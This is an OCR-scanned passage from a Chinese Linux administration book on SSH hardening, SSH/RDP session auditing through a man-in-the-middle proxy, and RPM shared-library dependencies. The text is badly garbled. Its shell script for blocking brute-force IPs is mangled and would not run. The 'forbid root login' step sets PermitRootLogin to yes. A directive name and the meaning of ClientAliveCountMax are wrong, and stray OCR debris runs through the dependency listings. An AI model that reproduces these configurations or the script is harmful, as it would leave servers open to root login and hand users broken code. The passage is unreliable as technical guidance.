打开 端口 。 可 以 触发 任何 操作 ， 比 如 运行 进程 或 执行 备份 。 当 然 ， 了解 要 使 用 的 命令 可 能 有 点 
儿 难 度 。 例如， 因为 我 运行 SUSE， 它 提供 自己 的 防火 墙 前 端 ， 所 以 不 得 不 通过 查看 Iptables -1 
的 输出 了 解 应 该 执行 哪个 命令 来 打开 或 关闭 端口 54321。 

4. 修改 SSH 远程 登录 显示 信息 

为 了 提醒 非法 入 侵 者 ， 可 以 自 定义 设置 警告 或 提醒 信息 ， 起 到 警示 登录 者 的 作用 。 


#vi /etc/ssh/sshd config 


将 PrintMotd 设置 为 yes。 
编辑 /etc/motd 文件 ， 加 入 你 希望 警告 的 语句 : 


#vi /etc/motd 
测试 一 下 效果 : 


# ssh 192.168.150.200 
root@192.168.150.200's password: 
Last login: Thu Nov 22 10:21:16 2011 from station25.test.com 


警告 : 你 已 经 登录 到 一 个 重要 服务 器 ， 所 有 操作 将 被 记录 ， 非 法 操作 将 依法 追究 法 律 责任 ! 


5. 设置 SSH Server 保持 时 长 
如 果 用 户 连 线 到 SSH Server 后 闲置 一 段 时 间 ，SSH Server 会 在 超过 特定 时 间 后 自动 终止 
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SSH 连 线 。 若 习惯 长 时 间 连 接 ， 需 要 做 如 下 修改 。 
修改 sshd_config 配置 文件 ， 加 入 如 下 两 个 参数 保存 : 


TCPKeepAlive yes 
ClientAliveCountMax 3 


前 一 个 参数 表示 要 保持 TCP 连接 , 后 一 个 参数 表示 客户 端的 SSH 连 线 闲置 多 长 时 间 后 自 
动 终止 连 线 的 数值 ， 单 位 为 分 钟 。 
重启 sshd 生效 : 


#/etc/init.d/sshd restart 


6. 限制 用 户 访问 
首先 禁止 Root 用 户 登 录 SSH， 打 开 sshd_config 文件 : 


#vi /etc/ssh/sshd config 


将 PermitRootLogin 改 成 yes。 
仅 允 许 指定 用 户 ， 例 如 Tom 登录 系统 ， 还 是 在 sshd_config 配置 文件 中 加 入 “UserAllow 


Tom”。 


7. 访问 IP 的 限制 
通过 hosts.allow 仅 允 许 指 定 卫 〈 如 192.168.120.20) : 


#vi /etc/hosts .deny 
sshd:all 

#vi /etc/hosts.allow 
sshd:192.168.120.20 


8. 通过 Python 脚本 实现 


实现 原理 是 ， 找 出 /var/log/secure 中 的 IP 地 址 ， 统 计 次 数 ， 如 果 次 数 大 于 5， 那 么 写 入 
/etc/hosts.deny。 注 意 ,在 写 入 host.deny 之 前 还 要 判断 该 了 人 P 是 否 已 经 在 /etc/hosts.deny 中 ,这 段 
脚本 下 载 地 址 为 http://denyhosts.sourceforge.net/。 

测试 效果 : 


Connection to 192.168.150.20 closed. 

# ssh 192.168.150.20 

root@192.168.150.20's password: 

Permission denied, please try again. 
root@192.168.150.20's password: 

Permission denied, please try again. 
root@192.168.150.20's password: 

Permission denied (publickey,gssapi-~with-mic,password) 


出 现 最 后 一 行 的 信息 提示 表示 生效 。 
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也 可 以 用 Shell 脚本 来 实现 ， 在 /root 目录 下 新 建文 件 ssh_deny.sh 内 容 : 


#!/bin/bash 
cat /var/log/securelawk '/Failed/{print $ (NF-3)}'|sortluniq -clawk '{print 
$2"="$1;}' >/ssh/black.txt 
DEFINE="10" 
for i in ‘cat /ssh/black-txt` 


do 
IP=“echo $i |awk -F= '{print S$S1} 
NUM= echo $ilawk -F= '{print $2}'°~ 
if [ SNUM -gt S$DEFINE ]; 
then 
grep $IP /etc/hosts.deny > /dev/null 
LE [SE 0 1 
then 
echo "sshd:$IP" >> /etc/hosts.deny 
和 
Ee 
done 


设 定 每 分 钟 执行 一 次 ， 放 在 crontab 里 ， 每 隔 一 分 钟 就 去 读 /var/log/secure 日 志 信息 : 


#vi /etc/crontab 
*/1 * * * * root sh /root/ssh deny.sh 


9. 利用 SSH Key 实现 安全 证 书 登录 


在 这 里 知道 账号 和 口令 , 就 可 以 登录 到 远程 服务 器 。 所 有 传输 的 数据 都 会 被 加 密 , 但 是 不 
能 保证 你 正在 连接 的 服务 器 就 是 正确 的 服务 器 。 可 能 会 有 别 的 服务 器 在 冒充 真正 的 服务 器 , 也 
就 是 受到 “中 间 人 ”攻击 〈 这 个 案例 我 们 在 第 12 章 讲 解 过 ) 。 更 加 安全 的 方式 是 依靠 密 匙 证 
书 的 ， 也 就 是 首先 创建 一 对 密 匙 ， 并 把 公用 密 匙 放 在 需要 访问 的 服务 器 上 ， 连 接 到 SSH 服务 
器 上 ， 客户 端 软 件 就 会 向 服务 器 发 出 请 求 , 请 求 用 你 的 密 匙 进行 安全 验证 。 服务 器 收 到 请 求 之 
后 , 先 在 该 服务 器 上 你 的 主 目录 下 寻找 你 的 公用 密 匙 , 然后 把 它 和 你 发 送 过 来 的 公用 密 匙 进行 
比较 。 如 果 两 个 密 匙 一 致 ， 服 务 器 就 用 公用 密 匙 加 密 “ 质 询 ” (challenge) ， 并 把 它 发 送 给 客 
户 端 软件 。 客 户 端 软件 收 到 “质询 ”之 后 , 就 可 以 用 你 的 私人 密 匙 解密 ,再 把 它 发 送 给 服务 器 。 
这 就 好 比 在 现实 生活 中 , 开启 保险 箱 可 以 使 用 密码 和 钥匙 , 用 这 种 方式 ,你 必须 知道 自己 密 匙 
的 口令 。 

下 面 ， 我 们 将 对 利用 SSH Key 实现 安全 的 密 钥 证 书 方式 登录 进行 介绍 ， 客 户 端 为 Linux 


(1) 配置 OpenSSH 服务 端 
@ 修改 sshd_config 配置 文件 的 以 下 内 容 : 


# vi /etc/ssh/sshd config 
PermitEmptyPasswords no 


PasswordAuthentication no 
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RSAAuthentication yes 
PubkeyAuthentication yes 
AuthorizedKeysFile .ssh/authorized keys 
StrictModes no 


@) 为 用 户 (tom) 创建 authorized_keys 文件 : 


cd /home/tom 

mkdir .ssh 

touch .ssh/authorized keys 
chmod 700 .ssh 

chmod 600 .ssh/authorized keys 
chown -R tom:tom .ssh 


@ 重启 OpenSSH 服务 。 


# /etc/init.d/sshd restart 


(2) 使 用 Linux 终端 生成 SSH Key 

我 们 输入 以 下 命令 : 

#ssh-keygen -t rsa \\* 生 成 ssh 的 密 钥 对 ， 一般 -t 参数 后 面 是 要 创建 的 密 钥 类 型 ， 这 里 是 
rsa(ssH-2)\\ 

Generation public/private rsa key pair. 

Enter file in which to save the key (/home/tom/.ssh/id rsa): 

Enter passphrase (empty for no passphrase): 

Enter same passphrase again: (这 两 行 代表 是 否 为 密 钥 文件 添加 密码 验证 ， 如 果 不 适用 请 按 回 
车 键 跳 过 ) 

Your identification has been saved in /home/tom/ -ssh/id rsa. 

Your public key has been saved in /home/tom/.ssh/id rsa.pub. 

The key fingerprint is: 

6b:af:b8:42:fd:87:e3:fd:a4;d2:89:3b:d2:b7:d8:ce tom@localhost.localdomain 


密 钥 就 存放 在 /home/tom/.ssh 目录 下 , 进入 此 目录 发 现 有 两 个 文件 id_rsa 和 id_rsa.pub, 将 
文件 中 的 内 容 复 制 下 来 ， 粘 贴 到 服务 器 中 需要 通过 密 钥 登录 的 用 户 ( 例 如 tom) 的 
~/.ssh/authorized_key 文件 (将 公 钥 传 到 服务 器 某 个 用 户 的 home 目录 下 的 这 个 文件 ) 中 。 接 下 
来 我 们 可 以 通过 cat .ssh/authorized_key 查看 到 这 个 文件 。 注意 ， 在 生成 了 key 之 后 , 一定 要 保 
存 好 生成 的 两 个 证 书 文件 ,它们 分 别 代 表 了 公 钥 和 私 钥 ， 其 中 公 钥 用 于 添加 到 服务 器 端 ， 用 来 
识别 私 钥 ， 私 钥 用 于 服务 器 认证 。 这 时 ， 当 你 在 命令 行 下 登录 就 会 出 现 提示 ， 表 明 密 钥 已 经 通 
过 验证 。 

#ssh tom@192.168.120.20 

Enter passphrase for key '/home/tom/.ssh/id rsa': 


当然 ， 也 可 以 使 用 PuTTY、SSH Secure Shell 图 形 化 客户 端 软件 ， 其 过 程 和 上 面 介绍 的 类 
似 ， 大 家 可 以 自行 测试 。 
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14.4 SSH/RDP 远程 访问 审计 方法 


对 于 SSH、RDP 这 样 的 加 密 协 议 ， 如 果 做 安全 审计 ， 因 为 数据 包 被 加 密 ， 用 一 般 的 嗅 探 
技术 无 法 分 析 其 中 的 代码 ,而 且 这 两 种 协议 通常 在 网 络 路 由 交换 设备 和 服务 器 运 维 当 中 使 用 最 
为 广泛 。 不 少 大 型 企业 IT 运 维 人 员 数 量 众多 ， 其 中 正式 人 员 与 聘用 人 员 混 杂 ， 当 使 用 同一 个 
账号 登录 后 , 由 于 误 操作 而 导致 运 维 管理 出 现 安全 问题 的 情况 也 时 有 发 生 。 以 下 列 出 了 常见 的 
问题 。 


1. 内 部 人 员 操作 安全 隐患 


企业 中 IT 维护 人 员 使 用 多 个 账号 较为 普遍 ， 用 户 需要 记 住 多 套 口令 ， 同 时 在 多 个 系统 、 
设备 之 间 切 换 。 如 果 设 备 数量 达到 成 百 上 千 时 , 维护 人 员 进 行 一 项 简单 的 配置 时 , 需要 逐一 登 
录 相 关 设 备 ， 其 工作 量 可 想 而 知 。 


2. 第 三 方 维护 人 员 安全 隐患 


一 些 企 业 为 了 方便 外 聘 了 一 些 IT 人 员 或 者 直接 将 项 目 外 包 给 了 运 维 公 司 ， 但 是 由 这 些 人 
员 流 动 性 大 、 缺 少 操作 行为 监控 而 带 来 的 风险 日 益 增 大 。 


3. 共享 账号 安全 隐患 


在 目前 的 维护 方式 中 , 通常 直接 采用 系统 账号 完成 系统 级 别 的 认证 即 可 进行 维护 操作 。 随 
着 系统 的 增 大 , 运 维 人 员 与 系统 账号 之 间 的 交叉 关系 越 来 越 复 杂 , 当 一 个 账号 被 多 个 人 同时 使 
用 ,账号 不 具有 唯一 性 ， 系 统 账号 的 密码 策略 很 难 执行 ， 密 码 修改 要 通知 所 有 人 ， 如 果 有 人 离 
职 或 者 部 门 调动 ， 密 码 需要 立即 修改 , 如 果 密 码 泄露 则 无 法 追查 ,如 果 出 现 误 操 作 或 者 恶意 操 
作 ， 也 无 法 追查 到 责任 人 。 

为 加 强 信息 系统 风险 内 控 管 理 , 部 分 企业 部 署 了 网 络 安全 审计 系统 , 希望 能 够 达到 对 运 维 
人 员 的 操作 行为 进行 监控 的 目的 。 由 于 传统 网 络 安全 审计 的 技术 实现 方式 和 系统 架构 主要 通过 
分 析 网 络 数 据 包 进行 审计 ， 导 致 该 系统 只 能 对 一 些 非 加 密 的 运 维 操作 协议 进行 审计 ， 如 
Telnet， 却 无 法 对 维护 人 员 经 常 使 用 的 SSH、RDP 加 密 协议 、 远 程 桌面 等 进行 内 容 审 计 ， 无 
法 有 效 解决 对 运 维 人 员 操 作 行 为 的 监管 问题 ,大 多 数 网 络 安全 审计 系统 , 只 能 审计 到 卫 地 址 ， 
难以 将 IP 与 具体 人 员 身 份 准确 关联 ， 导 致 发 生 安全 事故 后 , 如 何 追 查 责任 人 成 为 一 个 新 的 难 
题 。 综 上 所 述 ， 企 业 对 于 运 维 审 计 系统 的 安全 性 要 求 越 来 越 高 ， 因 此 ， 如 何 提 高 运 维 审计 系统 
的 安全 性 以 及 审计 强度 至 关 重 要 。 

在 传统 安全 手段 中 , 使 用 防火 墙 和 IDS/IPS 设备 无 法 对 这 样 的 加 密 协 议 做 审计 ， 那么 我 们 
只 能 依赖 于 传统 的 审计 方式 ， 比 如 网 络 行为 (协议 、 源 /目的 地 址 、MAC 地 址 时 间 戳 等 ) 审计 、 
日 志 审 计 ， 但 是 由 于 加 密 协 议 的 存在 无 法 保证 100% 的 操作 审计 。 为 此 ， 不 少 企业 实施 了 基于 
IP 的 KVM 审计 方式 , 由 于 其 中 引入 身份 认证 授权 和 记录 操作 内 容 , 是 比较 好 的 运 维 安全 操作 
方式 。 但 是 使 用 KVM 方式 也 有 其 不 足 ， 例 如 它 是 通过 第 三 方 录 屏 软件 来 记录 操作 的 ， 所 以 记 
录 的 信息 繁杂 , 导致 后 台 存 储量 加 大 , 而 且 查询 检索 不 便 ; 无 法 对 远程 桌面 和 VNC、pcAnywhere 
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等 软件 的 行为 进行 回访 ; 由 于 KVM 的 独占 方式 , 只 要 有 一 个 用 户 登 录 则 其 他 用 户 均 无 法 登录 ， 
在 使 用 上 不 灵活 。 


14.4.1 ”远程 桌面 审计 实现 


RDP 是 一 种 图 形 化 的 远程 维护 协议 ，RDP 协议 可 分 为 5 层 : 网 络 连接 层 、ISO 数据 层 、 
虚拟 通道 层 、 加 密 解 密 层 和 功能 数据 层 。 通 过 对 RDP 协议 的 分 析 ， 网 络 连 接 层 、ISO 数据 
层 、 虚 拟 通道 层 和 加 密 解 密 层 用 于 实现 建立 TCP 连接 通道 , 真正 的 操作 部 分 在 功能 数据 层 中， 
因此 运 维 审计 系统 在 还 原 RDP 协议 操作 是 ， 主 要 对 功能 数据 层 进行 内 容 解 析 。 进 一 步 分 析 ， 
在 数据 层 的 实际 数据 主要 有 位 图 和 字符 点 阵 两 种 , 其 中 位 图 部 分 是 操作 的 背景 , 可 用 于 实现 图 
像 操 作 过 程 回 放 , 字符 点 阵 部 分 是 可 识别 并 还 原 的 具体 操作 , 因此 运 维 审计 系统 解析 内 容 时 需 
要 对 字符 点 阵 进行 转换 。 

RDP 在 操作 时 ， 如 鼠标 选中 某 个 文件 、 单 击 某 个 菜单 或 者 选择 某 个 窗口 ， 文 件 名 或 窗口 
名 称 会 高 亮 显示 ， 文 字 点 阵 会 通过 网 络 进行 传输 ， 运 维 审计 系统 通过 OCR 识别 技术 ， 将 对 应 
文字 点 阵 识 别 成 文字 并 记录 到 数据 库 中 。 

在 Windows 系统 的 远程 桌面 协议 RDP (Remote Desktop Protocol， 以 5.1 为 例 ， 实 际 指 的 
是 Windows 2000/XP 的 远程 桌面 ) 中 使 用 了 对 称 密码 算法 RC4 和 公 钥 密码 算法 RSA 的 128 
位 加 密 ， 其 中 RC4 用 于 数据 流 加 密 ， 而 RSA 算法 则 建立 会 话 密 码 。 虽 然 在 RDP 中 采用 了 证 
书 模 式 , 但 其 中 的 CA 证 书 仅 用 于 对 服务 器 公 钥 签名 , 客户 机 并 不 对 其 合法 性 和 正式 性 进行 验 
证 ， 如 果 攻 击 者 通过 ARP 欺骗 等 方式 (MITM 攻击 ) ， 攻 击 者 自己 构造 一 个 CA 证 书 ， 进 而 
伪造 服务 器 证 书 ， 从 而 使 原来 的 客户 机 与 服务 器 之 间 的 链接 ， 变 成 了 客户 机 与 MITM 机 联机 ， 
以 及 MITM 机 与 服务 器 的 联机 ， 这 样 完全 实现 了 对 服务 器 和 客户 机 的 通信 监听 。 


14.4.2 SSH 审计 实现 


SSH 协议 框架 中 最 主要 的 部 分 是 三 个 协议 : 传输 层 协 议 、 用 户 认 证 协议 和 连接 协议 。 传 
输 层 协议 〈Transport Layer Protocol) 提供 服务 器 认证 ， 数 据 机 密 性 、 信 息 完整 性 、 等 支持 ; 
用 户 认证 协议 (User Authentication Protocol) 则 为 服务 器 提供 客户 端的 身份 鉴别 ， 连接 协议 

(Connection Protocol) 将 加 密 的 信息 隧道 复 用 成 若干 个 逻辑 通道 ， 提 供给 更 高 层 的 应 用 协议 

使 用 。 说 起 SSH 协议 不 得 不 提 及 SFTP， 它 是 Secure File Transfer Protocol 的 缩写 ， 意 为 安全 
文件 传送 协议 。 可 以 为 传输 文件 提供 一 种 安全 的 加 密 方法 。SFTP 与 FTP 有 着 同样 的 语法 和 
功能 。SFTP 为 SSH 的 一 部 份 ， 是 一 种 传输 档案 至 文件 服务 器 的 安全 方式 ，SFTP 属于 开源 
协议 ， 不 存在 类 似 FTP 的 安全 或 版 权 问题 。 

在 SSH 加 密 的 通信 过 程 中 ， 每 一 个 主机 都 必须 有 自己 的 主机 密 钥 ， 密 钥 可 以 有 多 对 ， 每 
一 个 主机 密 钥 对 包括 公开 密 钥 和 私有 密 钥 。 只 有 掌握 密 钥 的 双方 才能 对 通信 数据 进行 解密 , 识 
别 通信 内 容 。 运 维 审计 系统 在 实现 SSH 操作 还 原 的 过 程 中 , 主要 使 用 的 是 中 间 人 协议 代理 方 
法 : 即将 原来 “客户 端 一 目标 服务 器 ”的 通信 方式 变 成 “客户 端 一 模拟 服务 器 ”、“ 模 拟 客户 
端 一 目标 服务 器 ”的 过 程 。 通过 运 维 审计 系统 进行 SSH 访问 时 ， 运 维 审计 系统 使 用 两 套 新 的 
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密 钥 对 分 别 与 客户 端 和 服务 器 进行 通信 , 因而 整个 SSH 操作 过 程 在 运 维 审计 系统 内 部 变 成 可 
识别 的 明文 信息 ， 实 现 SSH 加 密 操 作 的 还 原 。 


14.4.3 ”加 密 协 议 审 计 的 实施 


以 上 对 SSH/RDP 协议 的 审计 方法 进行 了 分 析 ， 这 里 主要 看 如 何 将 思路 落地 ， 在 开源 世界 
中 使 用 Xplico+dsniff 的 方式 ， 可 以 实现 常规 Htp、SSH、TELNET 等 协议 的 审计 ， 但 是 无 法 
对 RDP 协议 审计 ， 企 业 可 以 选用 商业 解决 方案 ， 例 如 ObserveIT、Session Auditor 这 两 款 商 业 
解决 方案 都 能 很 好 地 解决 加 密 协议 的 审计 问题 。 但 是 有 了 这 样 的 软件 是 不 是 就 意味 着 ssh/rdp 
这 类 加 密 协 议 不 安全 呢 ? 实际 上 这 些 流量 被 审计 设备 抓 取 并 审计 是 有 条 件 的 , 首先 此 设备 必须 
串联 在 链 路 上 ， 一 般 是 指 在 防火 墙 和 核心 交换 机 之 间 的 链 路 ， 这 样 一 来 让 所 有 SSH、RDP、 
VNC 的 流量 经 过 这 台 具 有 审计 功能 的 堡 爸 主 机 ， 如 图 14.18 所 示 。 
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附录 A Linux 系统 软件 包 的 依赖 性 问题 


不 管 是 初步 跨 入 Linux 殿堂 的 新 手 ,， 还 是 具有 多 年 经 验 的 专家 , 在 安装 或 编译 软件 包 的 过 
程 中 或 多 或 少 都 会 遇 到 包 的 依赖 问题 ， 从 而 导致 安装 过 程 无 法 继续 ， 比 如 管理 员 在 安装 php 
软件 包 时 需要 libgd.so 文件 ， 而 这 个 文件 属于 gb 软件 包 。 但 是 在 安装 gb 软件 包 时 ， 可 能 这 个 
软件 包 跟 其 他 软件 包 又 具有 依赖 关系 , 又 需要 安装 其 他 软件 包 才 行 。 这 时 有 的 管理 员 便 会 失去 
耐心 。 在 遇 到 这 种 Linux 软件 包 依赖 关系 问题 时 ， 该 如 何 解决 呢 ?在 介绍 具体 的 措施 之 前 ， 先 
跟 大 家 聊 聊 Linux 系统 里 的 软件 包 依 赖 性 问题 。 

处 理 RPM 依赖 性 故障 的 策略 可 以 分 成 两 类 : 自动 方法 和 手动 方法 。 但 当 安装 不 属于 发 行 
一 部 分 的 软件 包 时 自动 方法 是 不 可 用 的 。 在 描述 如 何 手工 解决 依赖 性 故障 后 , 将 简要 描述 如 何 
使 用 自动 方法 (Yum) 处 理 依赖 性 故障 。 


A.1 什么 是 依赖 性 


程序 依赖 于 程序 代码 的 共享 库 , 以 便 它 们 可 以 发 出 系统 调用 将 输出 发 送 到 设备 或 打开 文件 
等 (共享 库存 在 于 许多 方面 ， 而 不 只 局 限于 系统 调用 ) 。 没 有 共享 库 ， 每 次 程序 员 开发 一 个 新 
的 程序 时 ， 每 个 程序 员 都 需要 从 头 开始 重 写 这 些 基 本 的 系统 操作 。 当 编译 程序 时 ， 程 序 员 将 他 
的 代码 链接 到 这 些 库 。 如 果 链接 是 静态 的 ,编译 后 的 共享 库 对 象 代码 就 添加 到 程序 执行 文件 中 ; 
如 果 是 动态 的 , 编译 后 的 共享 库 对 象 代码 只 在 运行 时 需要 它 时 由 程序 员 加 载 。 动 态 可 执行 文件 
依赖 于 正确 的 共享 库 或 共享 对 象 来 进行 操作 。RPM 依赖 性 尝试 在 安装 时 强制 实施 动态 可 执行 
文件 的 共享 对 象 需求 ， 以 便 在 以 后 〈 当 程序 运行 时 ) 不 会 有 与 动态 链接 过 程 有 关 的 任何 问题 。 


注意 : 还 有 一 种 类 型 的 依赖 性 ， 它 基于 显 式 的 条 目 ，RMP 通过 程序 员 将 该 依赖 性 强加 到 
RPM 配置 文件 中 ， 但 目前 我 们 不 关心 这 种 类 型 的 依赖 性 ， 这 种 依赖 性 比较 容易 解决 。 这 里 将 
重点 放 在 RMP 强制 实施 的 、 更 加 复杂 的 共享 对 象 依赖 性 。 


A.2 动态 可 执行 文件 和 共享 对 象 


动态 可 执行 文件 使 用 最 初 编译 和 链接 程序 时 使 用 的 库 文件 的 共享 对 象 名 称 来 查找 共享 对 
象 。 它 们 在 少数 的 几 个 标准 位 置 查找 ， 比 如 在 /lib 和 /usr/lib 目录 及 在 LD_LIBRARY_PATH 环 
境 变 量 (主要 用 于 指定 查找 共享 库 ， 比 如 我 们 在 安装 Oracle 时 指定 路 径 ，export 
LD_LIBRARY PATH=$ORACLE_HOME/lib:/lib:/usrlib:/usrlocallib) 指定 的 目录 中 。 顺 
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便 提 一 下 , 在 这 些 库 目 录 中 找到 的 共享 对 象 可 能 不 是 真正 的 文件 , 它们 可 能 是 指向 位 于 其 他 位 
置 的 真实 库 文件 的 符号 链接 , 但 通常 仍旧 在 标准 库 目 录 的 一 个 目录 中 。 至 少 从 系统 管理 员 的 观 
点 来 看 ,用 于 创建 共享 库 文件 的 共享 库 软 件 包 的 名 称 和 共享 库 文件 的 名 称 之 间 通 常 没有 什么 关 
系 。 例 如 ，Glibe 2.3 软件 包 用 于 创建 libc.so.6 共享 库 文 件 。 还 要 注意 到 ， 添 加 到 共享 库 文件 名 
结束 的 版 本 号 〈.6) 跟 用 于 创建 它 的 版 本 号 (2.3) 没有 关系 。 这 是 由 共享 库 软 件 包 开发 人 员 有 
意 完成 的 ， 以 便 Glibe 的 新 版 本 可 以 重用 相同 的 共享 库 文 件 名 libc.so.6。 这 人 允许 你 在 系统 上 加 
载 新 版 本 的 Glibc， 而 不 用 中 断 动态 链接 到 lib.so.6 共享 库 文件 的 所 有 程序 ， 当 然 假 定 新 版 本 的 
Glibe 向 后 与 动态 可 执行 文件 最 初 所 链接 的 老 版 本 Glibe 兼容 。 因 此 ， 即 使 库 文件 或 共享 对 象 
文件 有 与 它们 相关 的 版 本 号 ， 这 些 版 本 号 也 不 能 帮助 你 确定 它们 来 自 哪个 版 本 的 共享 软件 包 。 

注意 : 当 将 whatprovides 选项 用 于 RPM 查询 命令 时 ， 可 以 获得 有 关 使 用 RPM 软件 包 加 
载 到 系统 的 现 有 共享 对 象 的 信息 。 这 种 混乱 是 由 下 面 的 事实 造成 的 : 单个 共享 库 文件 可 能 支持 
某 个 范围 的 共享 库 软件 包 版 本 。 例 如 ， 要 检查 soname 库 文件 /lib/libe.so.6 支持 的 Glibe 共享 库 
软件 包 ， 可 以 运行 下 面 的 命令 : 

#0objdump --all-headers /lib/libc.so.6 | less 


向 下 滚动 此 报告 ， 直 到 到 达 Version definitions: 部 分 ， 以 便 查看 libc.so.6 共享 库 文件 支持 
哪些 Glibe 版 本 : 


Version definitions: 
1 0x01 0x0865f4e6 libc.so. 
2 0x00 0x0d696910 GLIBC 2.0 
3 0x00 0x0d696911 GLIBC 2.1 
GLIBC 2.0 
4 Ox00 0x09691f71 GLIBC 2. 
GLIBC 2.1 
5 Ox00 0x09691f72 GLIBC 2.1. 
GLIBC 2.1.1 
0x00 0x09691f73 GLIBC 2.1.3 
GLIBC 2.1.2 
7 0x00 0x0d696912 GLIBC 2.2 
人 ED 二 
0x00 0x09691a71 GLIBC 2.2.1 
GLIBC 2.2 
9 0x00 0x09691a72 GLIBC 2.2.2 
GLIBC 2.2.1 
10 0x00 0x09691a73 GLIBC 2.2.3 
GLIBG 22.2 
11 0x00 0x09691a74 GLIBC 2.2.4 
GLIBC 2.2.3 
12 0x00 0x09691a76 GLIBC 2.2.6 


on 


[mn 
[mn 


上 
I 


an 


op 
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ETTPCE2 2 二 人 

13 0x00 0x0d696913 GLIBC 2.3 
GLIBGE2 S26 

14 0x00 0x09691972 GLIBC 2.3.2 
GLIBC 2.3 

15 0x00 0x09691973 GLIBC 2.3.3 
GLIBC 2.3.2 

16 0x00 0x09691974 GLIBC 2.3.4 
GITBCE2S3ES 

17 0x00 0x0d696914 GLIBC 2.4 
GLIBC 2.3.4 

18 0x00 0x0d696915 GLIBC 2.5 
GLIBC 2.4 

19 0x00 0x0963cf85 GLIBC PRIVATE 
GLIBC 2.5 

20 0x00 0x0b792650 GCC 3.0 


在 本 示例 中 ，1libe.so.6 共享 库 文件 支持 原先 为 Glibe 版 本 2.0 到 2.5 而 开发 的 所 有 动态 执 
行文 件 。 注 意 : 也 可 以 使 用 objdump 命令 来 从 共享 库 文件 中 提取 soname， 命 令 如 下 所 示 : 


# objdump --all -headers /lib/libcrypto.so.0.9.8b| grep SONAME 
SONAME libcrypto.so.6 
objdump: /lib/libcrypto.so.0.9.8b: no recognized debugging information 


接 下 来 ， 将 讨论 RPM 软件 包 是 如 何 生 成 的 ， 以 便 在 新 系统 上 安装 RPM 软件 包 时 ， 这 些 
共 库 依赖 性 是 已 知 的 。 


A.3 RPM 软件 包 和 共享 库 依赖 性 


当 程 序 员 生 成 RPM 软件 包 时 ，ldd 命令 用 于 报告 动态 可 执行 文件 软件 包 中 所 有 动态 可 执 
行文 件 使 用 的 所 有 共享 库 。 另 一 个 混乱 是 由 下 面 的 事实 带 来 的 : 相同 软件 包 中 的 不 同 动态 可 执 
行文 件 可 能 与 相同 的 共享 库 软 件 包 的 不 同 版 本 进行 链接 。 例 如 ，Heartbeat 软件 包 中 的 不 同 程 
序 可 能 已 经 进行 了 开发 , 并 动态 链接 到 libc.so.6 soname 共享 库 文件 的 不 同 Glibe 版 本 。 对 RPM 
命令 使 用 -q 和 --requires 参数 ， 可 以 看 到 RPM 软件 包 需 要 的 共享 库 的 完整 清单 。 例 如 ， 要 看 到 
Heartbeat RPM 软件 包 所 有 的 所 需 依赖 性 ， 可 以 使 用 命令 : 


#rpm -q --requires -p heartbeat-l1.x.x.i386.rpm 
这 产生 了 下 面 的 报告 : 


sysklogd 
/bin/sh 


Linux ”企业 应 用 案例 精 解 


/bin/sh 
/usr/bin/python 
ld-linux.so.2 
libapphb.so.0 
libc.so.6 
libc.so.6(GLIBC 2.0) 
libc.so.6(GLIBC 2.1) 
libc.so.6(GLIBC 2.1.3) 
libc.so.6(GLIBC 2.2) 
libc.so.6(GLIBC 2.3) 
libccmclient.so.0 

了 pol -se 
libpglib-1.2=30.0, 
libhbclient.so.0 
libpils.so.0 
libplumb.so.0 
libpthread.so.0 
librt.so.1 
libstonith.so.0 


注意 : 在 此 报告 中 ，libc.so.6 soname 是 所 需要 的 ， 此 共享 库 必须 支持 使 用 Glibc 共享 软件 
包 版 本 号 2.0、2.1、2.1.3、2.2 和 2.3 进行 链接 的 动态 可 执行 文件 。 这 是 由 下 面 的 事实 决定 的 : 
Heartbeat 软件 包 中 的 不 同 动态 可 执行 文件 是 针对 不 同 版 本 的 libe.so.6 库 的 每 个 版 本 进行 链接 
的 。 在 了 解 了 动态 可 执行 文件 、 共 享 对 象 、soname 和 共享 库 软 件 包 彼此 是 如 何 相关 联 之 后 ， 
下 面 来 看 这 样 的 一 个 例子 ， 当 尝试 安装 RPM 软件 包 ， 并 且 它 由 于 依赖 性 错误 而 失败 时 ， 会 发 
生 什么 ? Yum 能 够 从 指定 的 服务 器 自动 下 载 RPM 包 并 且 安 装 , 可 以 自动 处 理 依赖 性 关系 ,并 
且 一 次 安装 所 有 依赖 的 软体 包 ， 无 须 繁 琐 地 一 次 次 下 载 和 安装 。 


A.4 手动 解决 依赖 性 问题 


通常 ， 当 尝试 安装 发 行 版 中 没有 包括 的 软件 包 ( 即 不 能 使 用 像 up2date、apt-get 或 Yum 一 
样 的 更 新 工具 自动 解决 其 依赖 性 的 软件 包 ) 时 ， 将 碰 到 RPM 依赖 性 错误 。 例 如 ， 如 果 尝 试 在 
老 的 Linux 发 行 版 上 使 用 RPM-ivh *RPM 命令 ， 如 所 有 的 Heartbeat RPM 包 ， 那 么 在 安装 过 程 
中 就 可 能 碰 到 下 面 的 错误 : 
error: failed dependencies: 
libc.so.6(GLIBC 2.3) is needed by heartbeat-1.x.x 
libc.so.6(GLIBC 2.3) is needed by heartbeat-pils-l1.x.x 
libcrypto.so.0.9.6 is needed by heartbeat-stonith-1.x.x 
libsnmp-0.4.2.6.so is needed by heartbeat-stonith-l1.x.x 
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注意 : RPM 命令 没有 干扰 报告 所 需 的 每 个 Glibe 共享 库 软件 包 版 本 号 一 一 它 只 报告 所 需 
的 最 高 编号 的 版 本 号 〈Glibe 2.3) 假定 原来 的 软件 包 开 发 人 员 不 会 将 相同 软件 包 中 的 可 执行 
文件 链接 到 不 兼容 版 本 的 共享 库 软件 包 )。 所 有 的 这 些 故 障 都 报告 所 需 的 共享 库 名 称 或 soname 
(而 不 是 文件 名 称 ，soname 始终 以 lib 开始 ) ， 但 可 以 删除 添加 到 RPM 报告 的 soname 结束 
的 版 本 号 ， 并 快速 检查 以 确定 是 否 在 系统 中 使 用 locate 命令 安装 这 些 共享 库 ( 假 设 你 的 locate 
数据 库 是 最 新 的 ， 有 关 更 多 信息 ， 请 参阅 locate 或 slocate 的 手册 页 ) 。 例 如 ， 要 查找 liberypto 


共享 库 文件 ， 可 以 输入 : 


#locate libcrypto 

[root@localhost ~]# locate libcrypto 
/lib/libcrypto.so.0.9.8b 
/lib/libcrypto.so.6 


/root/.Trash/vmware-tools-distrib/1ib/1ib32/libcrypto. 
/root/.Trash/vmware-tools-distrib/1ib/1ib32/libcrypto. 


0.0.9.8 


/root/.Trash/vmware-tools-distrib/1ib/1ib64/1libcrypto. 
/root/.Trash/vmware-tools-distrib/1ib/1ib64/1libcrypto. 


OO0sDs8 
/usr/lib/libcrypto.a 
/usr/lib/libcrypto.so 
/usr/lib/pkgconfig/libcrypto.pc 
/usr/lib/vmware-tools/1ib32/libcrypto.so.0.9.8 


so 


so 


so 


so 


